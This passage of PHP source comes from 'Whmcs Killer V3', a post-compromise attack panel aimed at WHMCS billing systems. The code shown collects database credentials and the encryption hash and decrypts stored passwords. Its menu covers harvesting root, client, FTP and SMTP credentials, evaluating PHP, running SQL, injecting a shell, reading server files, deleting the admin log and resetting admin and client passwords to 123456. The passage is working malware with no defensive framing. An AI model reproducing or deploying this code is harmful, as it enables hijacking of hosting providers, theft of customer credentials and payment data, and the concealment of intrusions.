GxDrS0Dbe3B7q6CL29CsDAEMPDBMbGD8nJCczMORPQEz0U1BQ3MxXZGzAW3RkgLC4+GRwfIiMYGCQeIYInKyYdQhr0NUHdFjbZ2TzVFNHQmjFTluyYMWLDggHz1WuXLly3atGSFeuVK1arUqEyVWqURwGfPHEaOQCTyUs0IKmAhANIow0yGn17kWIHOXPo1LELBAA7'));
  58.   exit;
  59.   }    if ($_GET['img']==12){  header('Content-Type: image/gif');
  60.    echo (base64_decode('R0lGODlh8QFGAOYAAP////7+/v39/fv7++Hh4fz8/Pj4+Pn5+ff39/Hx8ebm5vLy8vb29uvr6+/v7+np6fT09O3t7ePj497e3tvb29bW1tjY2NLS0gR/wQJjl8/PzwRnnAJkmANlmQRmmxWn9gJmnAVonQR5uASAwwFilgWN1gaO1w2O0wNlmgNmmgJjmANtpgSEyBKf6gaDxQuL0AeFxwN0sAWJ0AaGywh1sBGZ4gZsogyL0BOh7QRnmwNkmQVongWFygqIzAeDxgWGywiFyQuLzweExxSl8gJmmwmHyg2O1BSk8QmIyw2N0gaK0gWM1QWDxQyHyAqKzgNspRGX3w+S2AqIzQeFyAyM0RWm9BWn9QiGygaM1A6P1RKa4waCxQqJzUCCpkCCpTV3m/D1+MTb6Huov2yszjZ4nNTY2kGn38PX4tXW15Ksuub0+z2VxYLC5LHL2fz9/vP3+Uefz77GyrvJ0JW9002z67bf9M7T1qe7xmeUrOfv86a9ygAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAADxAUYAAAf/gACCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnplqdXQ4VR8fn6ipqqusra6vsLGys4xsWkdWtLq7vL2+v8DBwolwNUPDyMnKy8zNzqphTS3P1NXW19jZr2A0UNrf4OHi49c2UQHo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAwocSJDgjiwFEypcyLChw4cQI0qcSJFeCCMVM2rcyLGjx48gQ8ILcUKAyZMoU6pcybKly5cwY8qcSbOmzZs4c+rcybOnz59AgwoVuqHk0KNIkypdyrSp06dQo0qNuSFJgatYs2rdyrWr169gw4odS7as2bNo06pdy7at27dw/+PKnTt3A5UBePPq3cu3r9+/gAMLHky4sOHDiBMrXsy4sePHkCNLnkyZ8oYblTNr3sy5s+fPoEOLHk2acI4XB1KrXs26tevXsGPLnk27tu3buHPr3s27t+/fwIMLH068eHEPQQwoX868ufPn0KNLn069uvXr2LNr3869u/fv4MOLH0++vHnzHpwgWM++vfv38OPLn0+/vv37+PPr38+/v///AAYo4IAEFmjggQd6wAUDDDbo4IMQRijhhBRWaOGFGGao4YYcdujhhyCGKOKIJJZo4okoopiCFBC06OKLMMYo44w01mjjjTjmqOOOPPbo449ABinkkEQWaeSRSCaZZP8KPSzg5JNQRinllFRWaeWVWGap5ZZcdunll2CGKeaYZJZp5plopqmmmiggkcCbcMYp55x01mnnnXjmqeeefPbp55+ABirooIQWauihiCaq6KKLolCEA5BGKumklFZq6aWYZqrpppx26umnoIYq6qiklmrqqaimquqqrLLawRURxCrrrLTWauutuOaq66689urrr8AGK+ywxBZr7LHIJqvsssw222wHQDQg7bTUVmvttdhmq+223Hbr7bfghivuuOSWa+656Kar7rrstuuuux1M8cC89NZr77345qvvvvz26++/AAcs8MAEF2zwwQgnrPDCDDfs8MMP6wCDAhRXbPH/xRhnrPHGHHfs8ccghyzyyCSXbPLJKKes8sost+zyyzDDzIEQEtRs880456zzzjz37PPPQAct9NBEF2300UgnrfTSTDft9NNQRx01Bz4QYPXVWGet9dZcd+3112CHLfbYZJdt9tlop6322my37fbbcMctt9wcbDHB3XjnrffefPft99+ABy744IQXbvjhiCeu+OKMN+7445BHLvnkkpfBgQsUZK755px37vnnoIcu+uikl2766ainrvrqrLfu+uuwxy777LTXTvsdRDBhwe689+7778AHL/zwxBdv/PHIJ6/88sw37/zz0Ecv/fTUV2/99dWjQcYTM1Tg/ffghy/+//jkl2/++einr/767Lfv/vvwxy///PTXb//9+OevP/54kCCCEhcIoAAHSMACGvCACEygAhfIwAY68IEQjKAEJ0jBClrwghjMoAY3yMEOYjAOafgCCWLwAxOAQAUZSKEKV8jCFrrwhTCMoQxnSMMa2vCGOMyhDnfIwx768IdADKIQh0jEIvpQBSBYgQh4gAUTjAADUIyiFKdIxSpa8YpYzKIWt8jFLnrxi2AMoxjHSMYymvGMaEyjGtfIxjOOgAUyWEIJSqCBOtrxjnjMox73yMc++vGPgAykIAdJyEIa8pCITKQiF8nIRjrykZCMJCPlMAczkMIUHsykJjfJyU568v+ToAylKEdJygWO4RZW2J8qV8nKVrrylbCMpSxnSctapm8NxsCeLnfJy1768pfADKYwh0nMYhpPD9KwnTKXycxmOvOZ0IymNKdJzWqSzg7doJw2t8nNbnrzm+AMpzjHSc5yDs4cc0unOtfJzna6853wjKc850lPsR1EavjMpz73yc9++vOfAA2oQAcatIvE7KAITahCF8rQhjr0oRCNqERBRhKIWfSiGM2oRjfK0Y569KMgDem/ivKukpr0pChNqUpXytKWuvSlMPVWVZxF05ra9KY4zalOd8rTnvr0p72yS6uGStSiGvWoSE2qUpfK1KY6lVOXYZRUp0rVqlr1qlj/zapWt8rVru7pNGsKq1jHStaymvWsaE2rWtfKVi0hR0lwjatc50rXutr1rnjNq173mqP0pOivgA2sYAdL2MIa9rCITaxiMaQgBDn2sZCNrGQnS9nKWvaymM3sfVZ0ns569rOgDa1oR0va0pr2tKi1DpOMw9rWuva1sI2tbGdL29ra9ra1aVNpdsvb3vr2t8ANrnCHCxhHEfe4yE2ucpfL3OZy5lV0ia50p0vd6lr3utjNrna3y92xQGsq4A2veMdL3vKa97zodUm80sve9rr3vfCNr3yVIjGR2Pe++M2vfvfLX4bMrL8ADrCAB0zgAkeEagZOsIIXzOAGD7hu5IiwboQnTOEKd+INl7OwhjfM4Q5T+Ay587CIR0ziEgvDDV7gnolXzOIWu5gTYvCfEl5M4xrb+MZ5aEMXRljCExrxx0AOspCHTOQiG/nISE6ykl2IRCUy0YltjLKUp0zlKlv5yljOspa3zOUrvjGOcwwEADs='));
  61.   exit;
  62.   }    if ($_GET['img']==13){  header('Content-Type: image/gif');
  63.    echo (base64_decode('R0lGODlhAQBBANUAABis+xmt/QKI0Beq+QOK0gGHzhSl8hCe6wWN1Rap9xqu/giS3AqV3wKHzwaP2RWn9Q6b5xqv/wuX4gyY4w+d6Rir+giS2wmU3hGh7hKi7xmu/g2a5hOk8QeR2gSL0wyZ5AuW4RSl8wSM1Rao9gmT3QCGzQ6c6ACFzBWn9gaO1w2a5RSm9Bap+AWN1geQ2gqW4BKi8AGGzQ+e6gSL1Bit/BCf7BOj8E3T/wKJ0QaP2BGg7QAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAABAEEAAAY7wFtEoQkEaABAZTBgJUaoxypk4NhgGYyudpBRTJCN6jORgF6MC2lh6bgcuVQLIZp5CAScQNAoFGIlJ0EAOw=='));
  64.   exit;
  65.   }    if ($_GET['img']==14){  header('Content-Type: image/gif');
  66.    echo (base64_decode('R0lGODlhAQACAIAAAP///8/PzyH5BAAAAAAALAAAAAABAAIAAAICDAoAOw=='));
  67.   exit;
  68.   }    if ($_GET['img']==15){  header('Content-Type: image/gif');
  69.    echo (base64_decode('R0lGODlhDQBkAIABAOrq6v///yH5BAEAAAEALAAAAAANAGQAAAJLhI+py+0Po5y02ouz3rz7D4YiFUBB6Zwoo65K6yJwbMy0HeOuvvKoXwIKhQBfTXdAJm0JZhO2gEZVDWqV1hxpt9yu9wsOi8fkMqQAADs='));
  70.   exit;
  71.   }    if ($_GET['img']==16){  header('Content-Type: image/gif');
  72.    echo (base64_decode('R0lGODlhCQAJAIABAJ+fn////yH5BAEAAAEALAAAAAAJAAkAAAINRI6pZ+vYnotSmRtuAQA7'));
  73.   exit;
  74.   }    if ($_GET['img']==19){  header('Content-Type: image/gif');
  75.    echo (base64_decode('R0lGODlhBADIALMAAOrq6t8AAOvr6/////Hx8eEPD/39/eESEuzs7OIbG+pUVOpXV/z8/Pzk5PrY2AAAACH5BAAAAAAALAAAAAAEAMgAAAQ9cLSV3AlB4VC2/2AojmRpnmiqrmzrvnAsz3RtDgaBMAIAED5AL0gsGo/IpHLJbDqf0Kh0Sq1ar9isdruMAAA7'));
  76.   exit;
  77.   }   if ($_GET['img']==20){  header('Content-Type: image/gif');
  78.    echo (base64_decode('R0lGODlh8AHIALMAAOrq6t8AAP///+vr6/Hx8eESEulRUfz8/OpXV/rV1ezs7OIbG/zk5P39/eEMDAAAACH5BAAAAAAALAAAAADwAcgAAAT/MMhJq7046827/2AojmRpnmiqrmzrrgvCCG9t33iu73zv/8BOIREsGo/IpHLJbGoMzqh0Sq1arzgHdsvter/gsHhMLpvP6LR6zW673/C4fE6v2+/4vH7P7/v/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAwocSLCgwYMIEypcyLChw4cQI0qcSLGixYsYM2rcyLGjx48g/0OKHEmypMmTKFOqXMmypcuXMGPKnEmzps2bOHPq3Mmzp8+fQIMKHUq0qNGjSJMqXcq0qdOnUKNKnUq1qlUmALJq3cq1q9evYMOKHUu2rNmzaNOqXcu2rdu3cOPKnUu3rlwFBBoIsMu3r9+/gAMLHky4sOHDZAccQMy4sePHkCNLnkw5LIHKmDNr3sy5s+e/Az6LHk26tOnTqFOrXs26tevXsGPLnk27tu3buHPr3s27t+/fwIMLH068uPHjyJMrX868ufPn0KNLn069uvXr2LNr3869u/fv4MOLH0++vPnz6NOrX8++vfv38OPLn0+/vv37+PPr38+/v///AAYo4MSABBZo4IEIJqjgggw26OCDEEYo4YQUVmjhhRhmqOGGHHbo4YcghijiiCSWaOKJKKao4oostujiizDGKOOMNNZo44045qjjjjz26OOPQAYp5JBEFmnkkUgmqeSSTDbp5JNQRinllFRWaeWVWGap5ZZcdunll2CGKeaYZJZp5plopqnmmmy26eabcMYp55x01mnnnXjmqeeefPbp55+ABirooIQWauihiCaq6KKMNuroo5BGKumklFZq6aWYZqrpppx2OlkEADs='));
  79.   exit;
  80.   }    if ($_GET['img']==21){  header('Content-Type: image/gif');
  81.    echo (base64_decode('R0lGODlhDAAJAIABAIDQ/////yH5BAEAAAEALAAAAAAMAAkAAAITjB+Aa6B83JOUpoqzhRK254FBAQA7'));
  82.   exit;
  83.   }    if ($_GET['img']==22){  header('Content-Type: image/gif');
  84.    echo (base64_decode('R0lGODlhAQAjAMQAADAwMDExMTIyMjU1NUxMTEFBQT8/P0pKSkdHR1BQUDk5OT4+PjQ0NDw8PDc3Nzo6OkJCQk9PTzMzM0REREhISDs7O05OTjY2NkVFRQAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAABACMAAAUaYBJZBHFQCDZBhbE01aM41zAwkiAEfAD8vxAAOw=='));
  85.   exit;
  86.   }    if ($_GET['img']==23){  header('Content-Type: image/gif');
  87.    echo (base64_decode('R0lGODlhCAAIAMQAAM/Pz/////r6+t7e3vz8/N/f39TU1NbW1vv7+9LS0tPT0/j4+OHh4dzc3NXV1d3d3f39/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAAIAAgAAAUtYCAMSTIIAWEALGAgBTAQxAAUKyq6CqALAEWssVg8bohDC+BABCCMw4FBCIQAADs='));
  88.   exit;
  89.   }  if ($_GET['img']==24){  header('Content-Type: image/gif');
  90.   echo (base64_decode('R0lGODlhCAAIAMQAAN8AAP///+lOTuQkJP3t7fzn5+IXF+pXV/rb2+pUVOEREeIaGvzk5OtgYPzr6/zl5ehFReMeHvzq6uIYGOlRUf3w8OIbG/729uhLSwAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAAIAAgAAAUzYPAIiiI8AWEBLDBJByAQBAUcC8AEAQMsBkCBVwAYEgAIAoEBJByDFiDiCFwag0GjEggBADs='));
  91.   exit;
  92.   }   function login(){echo"
  93.  
  94. <center><div id='content' class='box'>
  95.  
  96. <br>
  97. <center>
  98.  
  99. <h3  class=\"tit\">
  100. DB configuration of WHMCS</h3><br>
  101. </center>
  102.  
  103. <FORM action=\"\"  method=\"post\" >
  104.  
  105. <input type=\"hidden\" name=\"form_action\" value=\"1\">
  106. <br>
  107.  
  108. <table  >
  109.  
  110.  
  111. <tr class='bg'><td>Database Host </td><td><input type=\"text\" size=\"60\" name=\"db_host\" value=\"".$_COOKIE["db_host"]."\"></td></tr>
  112.  
  113. <tr ><td>Database Username </td><td><input type=\"text\" size=\"60\" name=\"db_username\" value=\"".$_COOKIE["db_username"]."\"></td></tr>
  114.  
  115. <tr class='bg'><td>Database Password</td><td><input type=\"text\" size=\"60\" name=\"db_password\" value=\"".$_COOKIE["db_password"]."\"></td></tr>
  116.  
  117. <tr><td>Database Name</td><td><input type=\"text\" size=\"60\" name=\"db_name\" value=\"".$_COOKIE["db_name"]."\"></td></tr>
  118.  
  119. <tr class='bg'><td>cc_encryption_hash</td><td><input type=\"text\" size=\"60\" name=\"cc_encryption_hash\" value=\"".$_COOKIE["cc_encryption_hash"]."\"></td></tr>
  120.  
  121.  
  122.  
  123. </table
  124. <br>
  125.  
  126. <INPUT class=\"input-submit\"  type=\"submit\" value=\"Submit\" name=\"Submit\">
  127. </FORM>
  128.  
  129.  
  130.  
  131. <h3  class=\"tit\">Symlink to configuration.php of WHMCS</h3><br>
  132.  
  133.  
  134. <FORM action=\"\"  method=\"post\">
  135. <input type=\"hidden\" name=\"form_action\" value=\"2\"><br>
  136.  
  137. <table ><tr class='bg'><td><input type=\"text\" size=\"30\" name=\"file\" value=\"\">
  138. <br>
  139.  </td><td><INPUT class=\"input-submit\"  type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table>
  140.  
  141. </FORM>";
  142. if($_COOKIE["login"]=="1"){$key=$_COOKIE["db_name"]."-".base64_encode(base64_encode($_COOKIE["db_host"])."|".base64_encode($_COOKIE["db_username"])."|".base64_encode($_COOKIE["db_password"])."|".base64_encode($_COOKIE["db_name"])."|".base64_encode($_COOKIE["cc_encryption_hash"])."|");
  143. echo"<p class='msg info'>Short info is <br><textarea cols=50 rows='4'>$key</textarea></p><br>";
  144. }echo"<h3  class=\"tit\">Short info</h3><FORM action=\"\"  method=\"post\">
  145.  
  146. <input type=\"hidden\" name=\"form_action\" value=\"3\">
  147. <br>
  148.  
  149. <table ><tr class='bg'><td><input type=\"text\" size=\"60\" name='key' ></td><td>
  150. </td><td><INPUT class=\"input-submit\"  type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table>
  151.  
  152. </FORM></center></div>
  153. <br>
  154. ";
  155. echo"</div> <!-- /cols -->
  156.     <hr class=\"noscreen\" />
  157.     <!-- Footer -->
  158.     <div id=\"footer\" class=\"box\">
  159.     <p class=\"f-left\">Coded by <a href=\"http://www.rab3oun.net\">RAB3OUN</a>, </p>
  160.         <p class=\"f-right\">Templates by Adminizio</p>
  161.     </div> <!-- /footer -->
  162. </div> <!-- /main -->
  163. </body>
  164. </html>";
  165. }function decrypt($string,$cc_encryption_hash){$key=md5(md5($cc_encryption_hash)).md5($cc_encryption_hash);
  166. $hash_key=_hash($key);
  167. $hash_length=strlen($hash_key);
  168. $string=base64_decode($string);
  169. $tmp_iv=substr($string,0,$hash_length);
  170. $string=substr($string,$hash_length,strlen($string)-$hash_length);
  171. $iv=$out="";
  172. $c=0;
  173. while($c<$hash_length){$iv.=chr(ord($tmp_iv[$c])^ord($hash_key[$c]));
  174. ++$c;
  175. }$key=$iv;
  176. $c=0;
  177. while($c<strlen($string)){if(($c!=0 AND$c%$hash_length==0)){$key=_hash($key.substr($out,$c-$hash_length,$hash_length));
  178. }$out.=chr(ord($key[$c%$hash_length])^ord($string[$c]));
  179. ++$c;
  180. }return$out;
  181. }function _hash($string){if(function_exists("sha1")){$hash=sha1($string);
  182. }else{$hash=md5($string);
  183. }$out="";
  184. $c=0;
  185. while($c<strlen($hash)){$out.=chr(hexdec($hash[$c].$hash[$c+1]));
  186. $c+=2;
  187. }return$out;
  188. }function randomt(){$chars="abcdefghijkmnopqrstuvwxyz023456789";
  189. srand((double)microtime()*1000000);
  190. $i=0;
  191. $pass="";
  192. while($i<=7){$num=rand()%33;
  193. $tmp=substr($chars,$num,1);
  194. $pass=$pass.$tmp;
  195. $i++;
  196. }return$pass;
  197. }function header2(){global$currentFile;
  198. echo"
  199. <html><title>Whmcs Killer V3 (Coded by RAB3OUN)</title><head>";
  200. echo"
  201.     <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=1\" />
  202.     <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=5\" />
  203.     <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=4\" title=\"2col\" />
  204.     <link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=3\" title=\"1col\" />
  205.    
  206.     <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=2\" /> <!-- GRAPHIC THEME -->
  207.      
  208. ";
  209. echo"
  210. <style>
  211. #content {border:1px solid #afafaf;
  212.  background:#fff;
  213. width:650;
  214. }
  215. </style>
  216. <meta http-equiv='Content-Type' content='text/html;
  217.  charset=utf-8' />
  218. </head>
  219. <body >
  220.     <center><img src='?img=0'></center>
  221. ";
  222. }function header1(){global$currentFile;
  223. @$query0=mysql_query("SELECT value FROM tblconfiguration where setting='Charset' or setting='charset'");
  224. @$v0=mysql_fetch_array($query0);
  225. $charset=$v0["value"]?$v0["value"]:"utf-8";
  226. echo"<?xml version=\"1.0\"?><!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">
  227. <html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">
  228. <head>
  229.     <meta http-equiv=\"Content-Type\" content=\"text/html;
  230.  charset=".$charset."\" />
  231.     <meta http-equiv=\"content-language\" content=\"en\" />
  232.     <meta name=\"robots\" content=\"noindex,nofollow\" />
  233.    
  234.     <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=1\" /> <!-- RESET -->
  235.     <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=5\" /> <!-- MAIN STYLE SHEET -->
  236.     <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=4\" title=\"2col\" /> <!-- DEFAULT: 2 COLUMNS -->
  237.     <link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=3\" title=\"1col\" /> <!-- ALTERNATE: 1 COLUMN -->
  238.    
  239.     <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"".$currentFile."?css=2\" /> <!-- GRAPHIC THEME -->
  240.      
  241.     <title>Whmcs Killer  V3 (Coded by RAB3OUN)</title>
  242. </head>
  243. <body>
  244. <div id=\"main\">
  245. <?/**/?>
  246.     <!-- Tray -->
  247.     <div id=\"tray\" class=\"box\">
  248.         <p class=\"f-left box\">
  249.        
  250.              <strong>WHMCS KILLER V3 </strong>
  251.         </p>
  252.         <p class=\"f-right\">&nbsp;
  253. &nbsp;
  254. &nbsp;
  255. &nbsp;
  256. &nbsp;
  257.  <strong><a href=\"?p=9\" id=\"logout\">Log out</a></strong></p>
  258.     </div> <!--  /tray -->
  259.     <hr class=\"noscreen\" />
  260.     <center><img src=\"?img=0\"></center>
  261.     <hr class=\"noscreen\" />
  262.     <!-- Columns -->
  263.     <div id=\"cols\" class=\"box\">
  264.         <!-- Aside (Left Column) -->
  265.         <div id=\"aside\" class=\"box\">
  266.             <div class=\"padding box\">
  267.            
  268.                
  269.            
  270.             </div> <!-- /padding -->
  271.             <ul class=\"box\">";
  272. $menu=array("h"=>"Home","102"=>"Info","1"=>"H0st r00ts","2"=>"Domains Resellers","3"=>"Clients r00ts","4"=>"Clients Hosting Accounts","63"=>"Clients Tickets ","100"=>"Clients List ","105"=>"Clients Password","7"=>"FTP and SMTP password","8"=>"Tools","101"=>"Eval PHP","99\" target=\"blank"=>"SQL","11"=>"BackUp","106"=>"DailyEmailBackup","108"=>"1nj3c7 Sh311","109"=>"Payment Gateways","111"=>"Addon Modules","107"=>"Index","112"=>"Custom Fields");
  273. if($_COOKIE["login"]<>"1")$menu=array("c1"=>"Db Config","c2"=>"Symlink to configuration.php of WHMCS","c3"=>"Short info");
  274. foreach($menu as$x=>$y){if($_GET["p"]==$x){echo("<li id='submenu-active'>
  275. <a href=\"?p=$x\"> $y</a>");
  276. }else{echo("<li ><a href=\"?p=$x\" > $y</a>");
  277. }if(($x==8)){echo"<ul>";
  278. echo"<li><a href=\"?p=8&page=1\" > Upload</a></li>
  279.  <li><a href=\"?p=8&page=2\" >Delete Adminlog </a></li>
  280. <li><a href=\"?p=8&page=3\" >Change Admin Password to 123456</a></li>
  281. <li><a href=\"?p=8&page=4\" >Change Client Password to 123456</a></li>
  282. <li><a href=\"?p=8&page=5\" >Change Client Mail </a></li>
  283. <li><a href=\"?p=8&page=6\" >Decrypt Password</a></li>";
  284. echo"</ul>";
  285. echo"</li>";
  286. }else{echo"</li>";
  287. }}echo "            </ul>
  288.        
  289.            
  290.         </div> <!-- /aside -->
  291.         <hr class=\"noscreen\" />
  292.         <!-- Content (Right Column) -->
  293.         <div id=\"content\" class=\"box\">
  294.        
  295. ";
  296. }function actionSql(){$_POST["p2"]=stripslashes($_POST["p2"]);
  297. echo"<script>
  298.     var c_ = '".htmlspecialchars($GLOBALS["cwd"])."';
  299.  
  300.     var a_ = '".htmlspecialchars(@$_POST["a"])."'
  301.     var charset_ = '".htmlspecialchars(@$_POST["charset"])."';
  302.  
  303.     var p1_ = '".((strpos(@$_POST["p1"],"
  304. ")!==false)?"":htmlspecialchars($_POST["p1"],ENT_QUOTES))."';
  305.  
  306.     var p2_ = '".((strpos(@$_POST["p2"],"
  307. ")!==false)?"":htmlspecialchars($_POST["p2"],ENT_QUOTES))."';
  308.  
  309.     var p3_ = '".((strpos(@$_POST["p3"],"
  310. ")!==false)?"":htmlspecialchars($_POST["p3"],ENT_QUOTES))."';
  311.  
  312.     var d = document;
  313.  
  314.     function set(a,c,p1,p2,p3,charset) {
  315.         if(a!=null)d.mf.a.value=a;
  316. else d.mf.a.value=a_;
  317.  
  318.         if(c!=null)d.mf.c.value=c;
  319. else d.mf.c.value=c_;
  320.  
  321.         if(p1!=null)d.mf.p1.value=p1;
  322. else d.mf.p1.value=p1_;
  323.  
  324.         if(p2!=null)d.mf.p2.value=p2;
  325. else d.mf.p2.value=p2_;
  326.  
  327.         if(p3!=null)d.mf.p3.value=p3;
  328. else d.mf.p3.value=p3_;
  329.  
  330.         if(charset!=null)d.mf.charset.value=charset;
  331. else d.mf.charset.value=charset_;
  332.  
  333.     }
  334.     function g(a,c,p1,p2,p3,charset) {
  335.         set(a,c,p1,p2,p3,charset);
  336.  
  337.         d.mf.submit();
  338.  
  339.     }
  340.     function a(a,c,p1,p2,p3,charset) {
  341.         set(a,c,p1,p2,p3,charset);
  342.  
  343.         var params = 'ajax=true';
  344.  
  345.         for(i=0;
  346. i<d.mf.elements.length;
  347. i++)
  348.             params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  349.  
  350.         sr('".addslashes($_SERVER["REQUEST_URI"])."', params);
  351.  
  352.     }
  353.     function sr(url, params) { 
  354.         if (window.XMLHttpRequest)
  355.             req = new XMLHttpRequest();
  356.  
  357.         else if (window.ActiveXObject)
  358.             req = new ActiveXObject('Microsoft.XMLHTTP');
  359.  
  360.         if (req) {
  361.             req.onreadystatechange = processReqChange;
  362.  
  363.             req.open('POST', url, true);
  364.  
  365.             req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  366.  
  367.             req.send(params);
  368.  
  369.         }
  370.     }
  371.     function processReqChange() {
  372.         if( (req.readyState == 4) )
  373.             if(req.status == 200) {
  374.                 var reg = new RegExp(\"(\\d+)([\\\S\\s]*)\", 'm');
  375.  
  376.                 var arr=reg.exec(req.responseText);
  377.  
  378.                 eval(arr[2].substr(0, arr[1]));
  379.  
  380.             } else alert('Request error!');
  381.  
  382.     }
  383. </script>
  384. <html>
  385. <title>Whmcs Killer V3 (Coded by RAB3OUN)</title>
  386. <head>
  387.  
  388. <style>
  389.  
  390.  
  391. body
  392.  
  393. {
  394.  
  395.     background: #0f0e0d;
  396.  
  397.  
  398.     color: #FF9933;
  399.  
  400.  
  401.  
  402.     padding: 0px;
  403.  
  404.  
  405.  
  406. }
  407.  
  408.  
  409. a:link, body_alink
  410.  
  411.  
  412. {
  413.  
  414.    
  415. color: #FF9933;
  416.  
  417.  
  418.    
  419. text-decoration: none;
  420.  
  421.  
  422. }
  423.  
  424.  
  425. a:visited, body_avisited
  426.  
  427. {
  428.  
  429.     color: #FF9933;
  430.  
  431.  
  432.     text-decoration: none;
  433.  
  434.  
  435. }
  436.  
  437.  
  438. a:hover, a:active, body_ahover
  439.  
  440. {
  441.  
  442.    
  443. color: #FFFFFF;
  444.  
  445.  
  446.    
  447. text-decoration: none;
  448.  
  449.  
  450.  
  451. }
  452. th:hover
  453.  
  454. {
  455.  
  456.    
  457. background: #524f46;
  458.  
  459.  
  460.    
  461. text-decoration: none;
  462.  
  463.  
  464.  
  465. }
  466.  
  467. td, th, p, li,table
  468.  
  469. {
  470.  
  471.    
  472.     background: #2e2b28;
  473.  
  474.  
  475.     border:1px solid #524f46;
  476.  
  477.  
  478. }
  479.  
  480.  
  481. input
  482.  
  483. {
  484.  
  485.     border: 1px solid;
  486.  
  487.  
  488.  
  489.     cursor: default;
  490.  
  491.  
  492.    
  493.     overflow: hidden;
  494.  
  495.  
  496.     background: #2e2b28;
  497.  
  498.  
  499.     color: #ffffff;
  500.  
  501.  
  502. }
  503.  
  504. </style>
  505.  
  506. <head><body><div style='position:absolute;
  507. width:100%;
  508. top:0;
  509. left:0;
  510. '>
  511. <form method=post name=mf style='display:none;
  512. '>
  513. <input type=hidden name=a>
  514. <input type=hidden name=c>
  515. <input type=hidden name=p1>
  516. <input type=hidden name=p2>
  517. <input type=hidden name=p3>
  518. <input type=hidden name=charset>
  519. </form>";
  520. class DbClass{var$type;
  521. var$link;
  522. var$res;
  523. function DbClass($type){$this->type=$type;
  524. }function connect($host,$user,$pass,$dbname){switch($this->type){case"mysql":if($this->link=@mysql_connect($host,$user,$pass,true))return true;
  525. break;
  526. case"pgsql":$host=explode(":",$host);
  527. if(!$host[1])$host[1]=5432;
  528. if($this->link=@pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"))return true;
  529. break;
  530. }return false;
  531. }function selectdb($db){switch($this->type){case"mysql":if(@mysql_select_db($db))return true;
  532. break;
  533. }return false;
  534. }function query($str){switch($this->type){case"mysql":return$this->res=@mysql_query($str);
  535. break;
  536. case"pgsql":return$this->res=@pg_query($this->link,$str);
  537. break;
  538. }return false;
  539. }function fetch(){$res=func_num_args()?func_get_arg(0):$this->res;
  540. switch($this->type){case"mysql":return@mysql_fetch_assoc($res);
  541. break;
  542. case"pgsql":return@pg_fetch_assoc($res);
  543. break;
  544. }return false;
  545. }function listDbs(){switch($this->type){case"mysql":return$this->query("SHOW databases");
  546. break;
  547. case"pgsql":return$this->res=$this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
  548. break;
  549. }return false;
  550. }function listTables(){switch($this->type){case"mysql":return$this->res=$this->query("SHOW TABLES");
  551. break;
  552. case"pgsql":return$this->res=$this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
  553. break;
  554. }return false;
  555. }function error(){switch($this->type){case"mysql":return@mysql_error();
  556. break;
  557. case"pgsql":return@pg_last_error();
  558. break;
  559. }return false;
  560. }function setCharset($str){switch($this->type){case"mysql":if(function_exists("mysql_set_charset"))return@mysql_set_charset($str,$this->link);
  561. else$this->query("SET CHARSET ".$str);
  562. break;
  563. case"pgsql":return@pg_set_client_encoding($this->link,$str);
  564. break;
  565. }return false;
  566. }function loadFile($str){switch($this->type){case"mysql":return$this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
  567. break;
  568. case"pgsql":$this->query("CREATE TABLE BOFF2(file text);
  569. COPY BOFF2 FROM '".addslashes($str)."';
  570. select file from BOFF2;
  571. ");
  572. $r=array();
  573. while($i=$this->fetch())$r[]=$i["file"];
  574. $this->query("drop table BOFF2");
  575. return array("file"=>implode("
  576. ",$r));
  577. break;
  578. }return false;
  579. }function dump($table,$fp=false){switch($this->type){case"mysql":$res=$this->query("SHOW CREATE TABLE `".$table."`");
  580. $create=mysql_fetch_array($res);
  581. $sql=$create[1].";
  582.  
  583. ";
  584. if($fp)fwrite($fp,$sql);
  585. else echo($sql);
  586. $this->query("SELECT * FROM `".$table."`");
  587. $head=true;
  588. while($item=$this->fetch()){$columns=array();
  589. foreach($item as$k=>$v){if($v==null)$item[$k]="NULL";
  590. elseif(is_numeric($v))$item[$k]=$v;
  591. else$item[$k]="'".@mysql_real_escape_string($v)."'";
  592. $columns[]="`".$k."`";
  593. }if($head){$sql="INSERT INTO `".$table."` (".implode(", ",$columns).") VALUES
  594.     (".implode(", ",$item).")";
  595. $head=false;
  596. }else$sql="
